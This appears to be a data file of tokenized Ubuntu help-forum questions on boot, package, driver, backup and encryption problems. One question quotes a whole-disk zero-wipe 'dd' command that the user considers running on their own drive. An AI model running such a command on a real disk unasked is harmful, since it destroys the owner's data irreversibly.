not configured yet . dpkg : error processing network-manager ( -- configure ) : dependency problems - leaving unconfigured
380032	how to turn off remote login ?	how do i turn off remote login ? i do n't want people to login to my computer remotely .
380035	error generating ubuntu 12.04 with live build	i 'm trying to build an ubuntu image using live build : lb config -- mode ubuntu -- distribution precise -- debian-installer true -- debian-installer true -- debian-installer-gui true i 'm getting the following errors : reading state information ... package busybox is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : busybox-static : i386 busybox-static e : package 'busybox ' has no installation candidate p : begin unmounting filesystems ...
380039	gptsync failure on macbook pro 8,2 , ubuntu 13.10 dualboot	i 'm having a very tough time dual booting with ubuntu 13.10/os x mavericks on my macbook pro 8,2 . before this is closed as a duplicate , i 've tried all popular solutions i could find to no avail , hopefully someone may be able to point out the error of my ways . problem : refit 's gpt sync tool , as well as gptsync 0.14-2 both report `` gpt partition of type 'unknown ' found , will not touch this disk '' , even after following the recommended ( 1 ) solution found in this post . steps i follow ( hopefully someone can recognize one of these as incorrect ) : installed refit from .pkg . reboot/login to mac twice . refit menu seen second time . created 2nd mac os x journaled filesystem with disk utility , while shrinking the original . reboot into ubuntu installer and start the installer 's partition tool . delete 2nd mac partition . create ext4 partition /dev/sda3 taking up all but 2gb of remaining space . create /dev/sda4 swap with remaining 2gb choose /dev/sda3 for bootloader installer ( can someone confirm this is correct ? i 've seen a lot of conflicting opinions . other option being /dev/sda , which i understand to be not what you should do since it will break os x boot ) run installer and reboot . tux shows up in the menu , but freezes on load when choosing this option . try to run the refit sync tool , and the mbr looks correct , recognizing /dev/sda3 as as linux partition , but /dev/sda3 is *unknown* in gpt . at this point i 'm pretty much i 'm at a loss . i attempted running the gptsync script recommended in the solution above to no avail . in addtion , i 've tried manually rebuilding the hybrid mbr with gdisk on the mac side ( 2 ) , but again - mbr looks fine , gpt has /dev/sda3 as *unkown* . running the tux option from refit after this option actually pulls up a grub recovery console , but it says it 's missing the filesystem . could anyone steer me in the right direction ? should i be using a different partitioning tool ? where should the linux bootloader be installed ? ( 1 ) i 'd link to this , but i do n't have 10 reputation . found here : help.ubuntu.com/community/mactelsupportteam/appleintelinstallation ( 2 ) ubuntuforums.org/showthread.php ? t=1810275 & page=19 & p=11215214 # post11215214
380046	how to close teamviewer automatically ?	i can launch teamviewer from a script . i can start/stop/restart the daemon , also . but , how do i close down the app window automatically ( whether it be from a script , crontab , whatever ) ? thanks in advance !
380047	can i flash another iso with startup disk creator , besides ubuntu ?	i had a laptop and that 's all . i was dual booting ubuntu 13.10 and window 7 , but recently windows failed and needed a recovery disk . i am trying to make a windows 7 recovery usb disk in ubuntu . i see the `` startup disk creator '' to use an iso file to make the usb . does startup disk creator work with a windows .iso file ? the complicated way is use the `` wintoflash '' in the wine emulator . any advice ?
380048	lubuntu desktop icons , auto arrange and lock workaround	on lubuntu 12.04 align to grid is working but i ca n't really lock desktop icon , they move around if any user drag them , there is n't a working option to lock them to a fixed position . searching the web for a solution did not help me so i 'm here asking . my thoughts about a possible solution is to use cron daemon to launch periodically a *select all desktop icon and align to grid command* , at least they will return on top left alignment , not perfect but something . i ' m not an expert so my concern about this is . how i put align to grid in a terminal ? i do n't know where to look , i tried looking in the log file of xorg , i only know that that action is triggered by right clicking on icons and selecting align to grid but terminal command is another story
380052	how to use xkbprint ?	there are no examples in the manual and every file i 've tried needs some geometry . $ xkbcomp /usr/share/x11/xkb/symbols/ua tmp/ua.xkm $ xkbprint tmp/ua.xkm can not open `` tmp/ua.xkm '' to read geometry $ xkbprint /usr/share/x11/xkb/symbols/ua error : could n't read geometry from xkm file `` /usr/share/x11/xkb/symbols/ua '' exiting
380053	laptop shut off during upgrade from 13.04 to 13.10	i was upgrading from 13.04 to 13.10 on my laptop when the battery died . now when i boot into it , i can get to the login screen . after i type my password , the screen appears to load but then i am sent back to the login screen with no error message or anything . do i have to reinstall ? is there anyway to easily recover my data ?
380055	android phone recovery mode not connecting	i use ubuntu 13.10 desktop . i was trying to install the ubuntu on my galaxy core gt-i826 , i created a backup , the next step was to unlock/root the phone . so i had to go into recovery mode . but here i had the big surprise that the ubuntu from the laptop could not recognize the android anymore , something related to mpt , in recovery mod . from the guide , on your computer , in a terminal , run sudo fastboot oem unlock , on the device screen , accept the terms of unlocking and yet that accepting terms message never appeared . is there any other solutions ? i also tried installing go-mtpfs , but it seems that the repository is no longer usable . so another fail .
380056	while libreoffice , word , and old pdfs from pre-system swap print fine , new pdfs seem to refuse to print properly	basically , the text , whether set large scale or small , prints like the cartridge is finished . just replaced it , and pre-ubuntu switch .pdfs , and all other doc formats print just fine . pretty frustrating . have tried the mp250 onboard cleaning etc , and altered about every setting i can think of . i have been forced by a nerd girlfriend onto ubuntu and this is one of many niggles that 's niggling hard as i do a lot of printing and research paper reviewing and can not stand more than 20 pages of continuous text . any ideas ?
380064	restored file from back in time has `` .backup.date ''	that 's basically my question . for example , there is /.bashrc and /.bashrc.backup.20131111 at the same time . what to do about them ? it seems like the back up version is what i intended to restore .
380065	ignoring java compilation and version control folders in ubuntu one	kubuntu 13.10 . working directly in ~/ubuntu one folder , where i have my java projects under ~/ubuntu one/java-projects . i want to ignore compilation and version control folders : classes , dist , .git , .svn and the like . created ~/.config/ubuntuone/syncdaemon.conf which contains : [ __main__ ] ignore = \a . */build\z \a . */target\z \a . */dist\z \a . */classes\z \a . */lib\z \a . */some/other/folders/to/ignore\z \a.*\.. *\z restarted daemon and reboot , but syncdaemon.conf seems to be `` ignored '' by u1 and nothing is ignored . i have tried different regular expressions but syncdaemon.conf still seems to be ignored . what 's wrong ? thanks .
380066	how to clone ubuntu installed on usb stick onto pc hdd ?	i'we allready have a usb stick with ubuntu installed . i 'm running ubuntu from the usb stick so that i can bring it with me and plug it into different computers and boot my allready tweaked and customized ubuntu that contains all the tools i need . since nothing about ubuntu seems impossible ; how do i install ubuntu on a pc 's hdd , containing all the data , settings , apps etc . from my usb stick ? in advance ; thanks edit : : the pc i transfered on to is a laptop running windows 8 . i 've used gparted livecd to create a 55gb ext4 expanded partition ( do n't know if it need to be an expanded or primary , but the partition on my usb is `` expanded '' ) , and a 5gb linux-swap partition . i 've managed to clone the 55gb partition from my usb stick to the hdd . i expect that the linux-swap partition does n't need to be cloned ? ! after some playing with bootrepair , i now have a bootable `` fully '' working system . but it 's slower and jittery now while running from the hdd . it pauses a lot , booting takes approximately 3-4 times longer than when i ran it from the usb . even win8 runs a lot smoother on this machine . should this be the case ? ?
380070	clonezilla live - usb boot - defaults to sda	background : images taken using clonezilla live , booted via cd and cloned 2 disks sda1 , and sdb1 . i am attempting to restore those same images using a usb drive to both boot machine into clonezilla and as my image repo . when i do this clonezilla is assigning the image repo on the usb as sda , and the 2 disks as sdb and sdc . this is causing an issue because the sda.pt.parted file no longer matches up because the disk to restore to has been marked as sdb . looking for ideas to either force the usb to mount as sdc or manually change the files to allow for restore on sdb , sdc .
380071	blue popup echo box at top of screen	i have this strange problem . when i connect to internet or disconnect from internet i get somekind of popup at top of screen like connected to router name . and it 's kinda annoying ... btw i am using unity de , tried several , like enlightenment , i3 , ratpoison , but had no time for tweaking them and just used purge to delete . and still i see that strange popup bar which i do n't had before ... any solution how to remove it ? edit : link , look at top of screen http : //i41.tinypic.com/169mc9l.png
380072	ca n't connect to any hostnames	i am trying to install tasksel via apt-get and then apt-get install tasksel but in both of these processes i get errors and it does n't install . i have tried pinging the ubuntu archives and common websites like google but that returns error : unknown host google.com i am connected to my lan as i am doing these commands through ssh and my lan has internet connection too . i can also connect to my server via ssh through my domain name/public ip . it seems i ca n't request connections but only receive them ? i do n't know : / i get a bunch of these errors when i try to update : err http : //security.ubuntu.com precise-security release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) ( ca n't post whole thing as it has more than 10 links )
380076	customise the prompt and display the battery capacity ?	how do i customise the zsh-prompt to show for example the time , the wi-fi status and the battery capacity ? is it possible to see my current battery charge in the prompt ? i have only found a way how to do that on mac os .
380078	standby mode ( suspend ) not working on my computer	when trying to turn the state suspend state the screen goes black , and after one second computer returns to the desktop . my motherboard is asus p5n-mx log from /var/log/pm-suspend.log : initial commandline parameters : sun nov 3 23:24:21 cet 2013 : running hooks for suspend . running hook /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux nowy 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 15:31:16 utc 2013 i686 i686 i386 gnu/linux module size used by bnep 17852 2 rfcomm 38400 0 bluetooth 211435 10 bnep , rfcomm nvidia 10287220 40 arc4 12509 2 rt2800usb 22525 0 rt2800lib 61785 1 rt2800usb crc_ccitt 12627 1 rt2800lib rt2x00usb 20099 1 rt2800usb binfmt_misc 17292 1 rt2x00lib 49096 3 rt2800usb , rt2800lib , rt2x00usb snd_hda_codec_realtek 65004 1 mac80211 541819 3 rt2800lib , rt2x00usb , rt2x00lib snd_hda_intel 38819 3 snd_hda_codec 118613 2 snd_hda_codec_realtek , snd_hda_intel cfg80211 453853 2 rt2x00lib , mac80211 snd_hwdep 13276 1 snd_hda_codec snd_pcm 85934 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 coretemp 13324 0 snd_rawmidi 25157 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51593 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq microcode 18433 0 snd 57014 15 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12600 1 snd mac_hid 13077 0 serio_raw 13031 0 i2c_nforce2 12913 0 asus_atk0110 17742 0 ppdev 12849 0 snd_page_alloc 18398 2 snd_hda_intel , snd_pcm parport_pc 27612 1 lp 17455 0 parport 40930 3 ppdev , parport_pc , lp hid_generic 12484 0 usbhid 46125 0 hid 83037 2 hid_generic , usbhid pata_acpi 12886 0 ahci 25631 0 libahci 26336 1 ahci pata_amd 13761 2 total used free shared buffers cached mem : 1932640 946216 986424 0 43504 460236 -/+ buffers/cache : 442476 1490164 swap : 1963004 0 1963004 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : having networkmanager put all interaces to sleep ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : /usr/lib/pm-utils/sleep.d/75modules suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : stop : unknown instance : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : nvidia binary video drive detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . sun nov 3 23:24:23 cet 2013 : performing suspend sun nov 3 23:24:30 cet 2013 : awake . sun nov 3 23:24:30 cet 2013 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video resume suspend : /usr/lib/pm-utils/sleep.d/99video resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95led resume suspend : /usr/lib/pm-utils/sleep.d/95led resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron resume suspend : /usr/lib/pm-utils/sleep.d/95anacron resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/90clock resume suspend : /usr/lib/pm-utils/sleep.d/90clock resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/75modules resume suspend : reloaded unloaded modules . /usr/lib/pm-utils/sleep.d/75modules resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager resume suspend : having networkmanager wake interfaces back up ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager resume suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : success . running hook /etc/pm/sleep.d/10_grub-common resume suspend :
380080	resetting an alias	in my .bashrc file i created a new alias : alias source=mvn eclipse : eclipse -ddownloadsource=true -ddownloadjavadoc=true i executed source .bashrc , however i realized the horrible mistake i made and i have been trying to undo it since . i tried unalias , but that does not work . i tried a restart , but the alias still exists . any suggestions ?
380081	cups without printer	is it possible to use cups without printer ? i want to send a request to another pc with cups , but i do n't have any printer . i just want to analyze network traffic and the sent request with wireshark ( or modify with scapy ) . at the second pc i will compare changes ( after modifying ) . i do n't want to print anything ? is it possible to do something like this or i must have a printer . maybe i did n't understand cups well , but i think it could be possible . thank you and sorry for my english : )
380085	an error occured , please run package manager	i 'm adita , i 'm new for using ubuntu and i 've some trouble , i ca n't opened ubuntu software center , update manager , etc an error occured , please run package manager from the right-click menu or apt-get in the terminal to see what is wrong . the error message was : 'error : opening the cache ( e : malformed line 57 in source list/etc/apt/sources.list ( dist parse ) e : the list of sources could not be read e : the package list or status file could not be parsed or opened. ) ' . this is usually means that your installed packages have unmet dependencies those are written in the red circle
380087	is it possible to get deb packages of older vlc versions ?	i need to use v. 2.0.8 for a vlc extension that does not work with the latest releases of the player . i would like to keep the deb of this version for further use , and also to learn how is it possible in general to get the deb files of older versions . i found that the deb for 2.1.1 version can be downloaded from here - but where from the older ones ?
380091	is this the current repositories for precise ?	i 've googled this for hours and ca n't seem to locate an official repository that responds ... # # main & restricted repositories deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted # # universe repositories deb http : //us.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe
380095	switching back from gnome to unity , wiping hard disk	i am new to ubuntu . i installed 12.04 , which runs unity . i decided to try gnome 13.10 . my pc did not particularly like gnome so i decided to switch back to unity with a fresh re-install , hoping any issues would be eradicated . it seems to have worked okay . my issue is the following : when reinstalling unity after installing gnome , it did n't recognise gnome - instead , it thought there was no os installed . i decided to use the `` something else '' installation and removed the partitions and made three : / ( 15gb ) , swap ( 4gb ) and /home ( the rest of the space ) . with this in mind , i was wondering whether the unity installation would completely remove gnome . does the re-install wipe the disk ? i noticed some of the other posts discussed running the livecd and using terminal for dd if=dev/zero of=/dev/ [ hard drive name ] . so , what should i do to make sure the hard disk is as new ? reinstall unity from the cd using the erase disk option again ? use the livecd terminal for some function , or do you think , despite not recognising gnome , that the fresh reinstall is sufficient ? any help would be much appreciated , i found similar posts but none with this specific issue .
380096	turn on off bluetooth from shell not from applet	ubuntu 13.04 64 bits , on elitebook 8740 , gnome desktop with bluetooth-applet shown . i could not figure out how to turn on and off from shell the buetooth and not from the notification bt applet menu . i need to turn on the service and the thing from menu from shell or c. service bluetooth start/stop has noting to do with the applet button menuitem because here are the scenarios i can see . 1. service off , menu item from applet is off ( shows turn on ) bt-device -- list yields bluez service is not found 2. service on , ( sudo service bluetooth start ) menu item from applet is off ( shows turn on ) bt-device -- list yields rg.bluez.error.nosuchadapter : no such adapter 3. service on , menu item from applet is on ( shows turn off ) bt-device -- list yields added devices : hmdx jam ( 36:8f : e8:07 : b2 : ca ) mint speaker ( 5ba5 ) ( 01:19:53:4c:5b : a5 ) 4. service off , menu item from applet is on ( shows turn off ) bt-device -- list yields bluez service is not found i want to be able to turn on and off the bluetooth as is being done from the applet button . how can i do this ?
380098	sound does n't work after updating , weird enough wine applications have sound	after installing ubuntu i decided to to do apt-get update apt-get upgrade and also installed the updates ubuntu notified me about . sound was working perfectly until i restarted my pc . oddly enough wine applications still have sound without any issues . edit : when i tried to play a video with vlc i got the following error : the audio device 'default ' could not be used : connection refused . hope this helps .
380101	unable to install locate or mlocate	i have a fresh install of ubuntu 12.04.3 lts ruinning cat /etc/apt/sources.list shows : deb http : //archive.ubuntu.com/ubuntu precise main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted universe multiverse but if i run sudo apt-get update & & sudo apt-get install mlocate locate i get package locate is a virtual package provided by : locate : i386 4.4.2-4ubuntu1 [ not candidate version ] e : package 'mlocate ' has no installation candidate e : package 'locate ' has no installation candidate please help ! i never realised how much i depend on the find command.. cheers , paul update to answer @ braiam # apt-cache policy locate mlocate locate : installed : ( none ) candidate : ( none ) package pin : 4.4.2-4ubuntu1 version table : 4.4.2-4ubuntu1 -10 500 http : //archive.ubuntu.com/ubuntu/ precise/universe amd64 packages mlocate : installed : ( none ) candidate : ( none ) package pin : 0.23.1-1ubuntu2 version table : 0.23.1-1ubuntu2 -10 500 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages # uname -a linux xxxx 3.0.20-xenu # 1 smp wed may 15 04:27:08 utc 2013 x86_64 x86_64 x86_64 gnu/linux second update to answer @ braiam : ~ # dpkg -- print-foreign-architectures i386 : ~ # cat /var/lib/dpkg/arch amd64 i386 third update to answer @ braiam sudo apt-get update get:1 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] hit http : //archive.ubuntu.com precise release.gpg get:2 http : //security.ubuntu.com precise-security release [ 49.6 kb ] get:3 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //archive.ubuntu.com precise release get:4 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] get:5 http : //security.ubuntu.com precise-security/main amd64 packages [ 342 kb ] hit http : //archive.ubuntu.com precise/main amd64 packages hit http : //archive.ubuntu.com precise/restricted amd64 packages hit http : //archive.ubuntu.com precise/universe amd64 packages get:6 http : //security.ubuntu.com precise-security/restricted amd64 packages [ 4,627 b ] hit http : //archive.ubuntu.com precise/multiverse amd64 packages get:7 http : //security.ubuntu.com precise-security/universe amd64 packages [ 85.2 kb ] hit http : //archive.ubuntu.com precise/main i386 packages get:8 http : //security.ubuntu.com precise-security/multiverse amd64 packages [ 2,439 b ] hit http : //archive.ubuntu.com precise/restricted i386 packages get:9 http : //security.ubuntu.com precise-security/main i386 packages [ 360 kb ] hit http : //archive.ubuntu.com precise/universe i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:10 http : //archive.ubuntu.com precise-updates/main amd64 packages [ 708 kb ] get:11 http : //security.ubuntu.com precise-security/restricted i386 packages [ 4,620 b ] get:12 http : //security.ubuntu.com precise-security/universe i386 packages [ 88.9 kb ] get:13 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2,635 b ] hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex get:14 http : //archive.ubuntu.com precise-updates/restricted amd64 packages [ 11.5 kb ] hit http : //security.ubuntu.com precise-security/main translation-en get:15 http : //archive.ubuntu.com precise-updates/universe amd64 packages [ 222 kb ] hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en get:16 http : //archive.ubuntu.com precise-updates/multiverse amd64 packages [ 14.0 kb ] get:17 http : //archive.ubuntu.com precise-updates/main i386 packages [ 729 kb ] get:18 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 11.4 kb ] get:19 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 226 kb ] get:20 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 14.2 kb ] hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en fetched 2,925 kb in 19s ( 150 kb/s ) reading package lists ... done
380102	is there a way to do ubuntu touch app development on windows ?	is there something to develop apps for ubuntu touch , but for windows ?
380103	ubuntu [ grub ] does n't show up in advanced boot options	installed ubuntu successfully on a pc running windows 7 but had no option in the boot menu . this is after a failed installation where grub failed to install . i decided to reinstall ubuntu and got no error message about grub , but still do n't see it in boot options . thanks
380106	skype message causes loud noise	skype is causing a loud buzzing noise whenever i send a message that continues even after i close out of it . after a short time period the noise will change to a different sound but i 'm not sure what is causing it . i looked for load-module module-udev-detect use_ucm= ... tsched= ... but could n't find use_ucm= ... tsched= ... in said line . any other suggestions ?
380115	can i re-download the adobe flashplugin 11 installer ( update manager ) ?	the download did not finish and the install failed . my update history lists the installer as installed ; it was n't . from now on i will do proprietary software downloads and installs at home . my home computer had no problem with the flashplugin installer download and install and it 's a slower computer . my internet service is a lot faster than the one at the coffee shop and it 's steadier , too . can i get a second shot at the adobe flashplugin installer download ?
380123	touchpad is lagging on a samsung laptop ( rv413 )	system specs : 2gb ram amd vision cpu radeon graphics question : i installed ubuntu 12.04.3 on the laptop ( specs listed , dualboot to windows ) . when i rebooted , everything was fine except that the touchpad was lagging . it takes a long time to respond . what is it that causes it to lag ? thank you . ps : i tried mouse calibration from the system settings , but it did n't help .
380124	wacom bamboo ctl-470 issues - ubuntu 13.10	i have having a few issues with my wacom bamboo ctl-470 on ubuntu 13.10 . every time i power on it tell 's me that the offical drivers are not installed so the device may not function properly . it gave me a wacom program that i can use , it lets me choose what monitor it works in and can configure button 's and what not but it wo n't work just right . as i use it every day i can tell when it ... feels wrong . very hard to explain but it seemed as if the mouse pointer is `` heavy '' when using it . how can i install the official drivers as the link on the ubuntu wiki is not working for me ? also on my windows install i could just navigate to wacom and re-size my screen area as i need the area on the tablet to be much smaller than it is natively . i normally have no issues with using a linux system but these drivers are alluding me or mayby iâm just too tired and am missing something obvious . thanks for taking time to read this .
380126	extundelete error	i messed up my computer pretty bad , deleted my documents folder . i 'm in another os now , and tried to run extundelete to fix it , most of it worked . but out of cruel irony , the only file i cared about failed to recover . i do not think it is a irreversible error though . it says when running the program , failed to restore inode 208480 to file recovered_files/lost+found/lpb/lpb.pro : could not open output file . failed to restore inode 208482 to file recovered_files/lost+found/lpb/secwindow.h : could not open output file . failed to restore inode 208483 to file recovered_files/lost+found/lpb/thiwindow.ui : could not open output file . failed to restore inode 208484 to file recovered_files/lost+found/lpb/secwindow2.ui : could not open output file . failed to restore inode 208485 to file recovered_files/lost+found/lpb/secwindow.ui : could not open output file . failed to restore inode 208486 to file recovered_files/lost+found/lpb/secwindow2.cpp : could not open output file . failed to restore inode 208487 to file recovered_files/lost+found/lpb/secwindow.cpp : could not open output file . failed to restore inode 208488 to file recovered_files/lost+found/lpb/mainwindow.ui : could not open output file . failed to restore inode 208489 to file recovered_files/lost+found/lpb/lpb.pro.user.2fe9f0b : could not open output file . failed to restore inode 208490 to file recovered_files/lost+found/lpb/mainwindow.cpp : could not open output file . failed to restore inode 208492 to file recovered_files/lost+found/lpb/mainwindow.h : could not open output file . failed to restore inode 208493 to file recovered_files/lost+found/lpb/secwindow2.h : could not open output file . failed to restore inode 208494 to file recovered_files/lost+found/lpb/main.cpp : could not open output file . failed to restore inode 208495 to file recovered_files/lost+found/lpb/lpb.pro.user : could not open output file . failed to restore inode 208496 to file recovered_files/lost+found/lpb/thiwindow.h : could not open output file . failed to restore inode 213718 to file recovered_files/lost+found/lpb/lpb.pro.user.880fe2c : could not open output file . those are the files i really care about . i would be willing to execute really low level commands if you provided them . the command i ran was : sudo extundelete /dev/sda6 -- restore-all how can i fix this ? edit : here are the outputs asked for . **id : **'uid=1000 ( brady ) gid=1000 ( brady ) groups=1000 ( brady ) ,10 ( wheel ) context=unconfined_u : unconfined_r : unconfined_t : s0-s0 : c0.c1023' **df -h : ** '/dev/mapper/fedora_localhost-root 44g 4.8g 37g 12 % / devtmpfs 1.9g 0 1.9g 0 % /dev tmpfs 2.0g 744k 2.0g 1 % /dev/shm tmpfs 2.0g 936k 2.0g 1 % /run tmpfs 2.0g 0 2.0g 0 % /sys/fs/cgroup tmpfs 2.0g 16k 2.0g 1 % /tmp /dev/sda8 477m 117m 331m 27 % /boot /dev/mapper/fedora_localhost-home 22g 2.5g 18g 13 % /home' **ls -ld lost+found lost+found/lpb : ** 'drwxr-xr-x . 4 root root 20480 nov 20 17:03 lost+found -rw-r -- r -- . 1 root root 29 nov 19 21:42 lost+found/lpb'
380127	luks dev mapper	can someone tell me why is blkid returning different results from what i can see in /dev/disk/by-uuid ? am i missing something obvious or is this simply bug ? root @ db01 : ~ # blkid /dev/sda1 : uuid= '' a96180b5-ab4c-4449-bbc0-53a64a095dd2 '' type= '' ext2 '' /dev/sda5 : uuid= '' c2e12538-5122-4e16-994a-63e641baa31c '' type= '' swap '' /dev/sda6 : uuid= '' 43f1434e-0e6c-47b6-ba2d-49b1f2d81c95 '' type= '' ext4 '' /dev/sda7 : uuid= '' 597f7735-5d5e-4ba0-9108-f962b1fec083 '' type= '' crypto_luks '' /dev/mapper/dbenc : uuid= '' bf774bca-221b-415b-b397-ad1cf76b84be '' type= '' ext4 '' root @ db01 : ~ # root @ db01 : ~ # ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 nov 20 12:06 43f1434e-0e6c-47b6-ba2d-49b1f2d81c95 - > ../../sda6 lrwxrwxrwx 1 root root 10 nov 20 12:06 a96180b5-ab4c-4449-bbc0-53a64a095dd2 - > ../../sda1 lrwxrwxrwx 1 root root 10 nov 20 17:13 bf774bca-221b-415b-b397-ad1cf76b84be - > ../../dm-0 lrwxrwxrwx 1 root root 10 nov 20 12:06 c2e12538-5122-4e16-994a-63e641baa31c - > ../../sda5 lrwxrwxrwx 1 root root 10 nov 20 12:06 d4e9bf92-c8e3-438f-8441-9edccca1d6b0 - > ../../sda7 root @ db01 : ~ # i cam across this whilst trying to configure luks device to be mounted automatically on reboot using keyfile ... bizzare really ... .
